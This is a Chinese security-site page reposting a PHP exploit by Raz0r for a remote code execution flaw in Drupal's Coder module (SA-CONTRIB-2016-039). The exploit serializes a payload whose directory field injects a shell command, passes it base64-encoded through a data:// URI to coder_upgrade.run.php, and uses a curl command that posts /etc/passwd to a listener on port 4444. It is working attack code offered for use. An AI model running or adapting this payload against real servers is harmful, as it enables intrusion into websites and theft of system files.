首页
|
安全文章
|
安全工具
|
Exploits
|
本站原创
|
关于我们
|
网站地图
|
安全论坛
当前位置:
主页
>
安全文章
>
文章资料
>
Exploits
>文章内容
Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONT
来源:http://raz0r.name 作者:Raz0r 发布时间:2016-08-09
<?php
# Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039)
#
https://www.drupal.org/node/2765575
# by Raz0r (
http://raz0r.name
)
#
# E-DB Note: Source ~
https://gist.github.com/Raz0r/7b7501cb53db70e7d60819f8eb9fcef5
$cmd = "curl -XPOST
http://localhost:4444
-d @/etc/passwd";
$host = "
http://localhost:81/drupal-7.12/
";
$a = array(
"upgrades" => array(
"coder_upgrade" => array(
"module" => "color",
"files" => array("color.module")
)
),
"extensions" => array("module"),
"items" => array (array("old_dir"=>"test; $cmd;", "new_dir"=>"test")),
"paths" => array(
"modules_base" => "../../../",
"files_base" => "../../../../sites/default/files"
)
);
$payload = serialize($a);
file_get_contents($host . "/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php?file=data://text/plain;base64," . base64_encode($payload));
?>
[
推荐
] [
评论(0条)
]
[返回顶部]
[打印本页]
[关闭窗口]
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
§最新评论:
热点文章
·
CVE-2012-0217 Intel sysret exp
·
Linux Kernel 2.6.32 Local Root
·
Array Networks vxAG / xAPV Pri
·
Novell NetIQ Privileged User M
·
Array Networks vAPV / vxAG Cod
·
Excel SLYK Format Parsing Buff
·
PhpInclude.Worm - PHP Scripts
·
Apache 2.2.0 - 2.2.11 Remote e
·
VideoScript 3.0 <= 4.0.1.50 Of
·
Yahoo! Messenger Webcam 8.1 Ac
·
Family Connections <= 1.8.2 Re
·
Joomla Component EasyBook 1.1
相关文章
·
VUPlayer 2.49 - (.pls) Stack B
·
Easy File Sharing Web Server 7
·
Barracuda Web App Firewall/Loa
·
AppArmor securityfs < 4.8 - aa
·
Zortam Media Studio 20.60 Buff
·
WebKit - TypedArray.fill Memor
·
VMWare - Setuid vmware-mount P
·
PhpMyAdmin 4.6.2 - Post-Auth R
·
AXIS Authenticated Remote Comm
·
Halliburton LogView Pro 9.7.5
·
Centreon 2.5.3 - Web Useralias
·
SMB Delivery Module
推荐广告
CopyRight © 2002-2022
VFocuS.Net
All Rights Reserved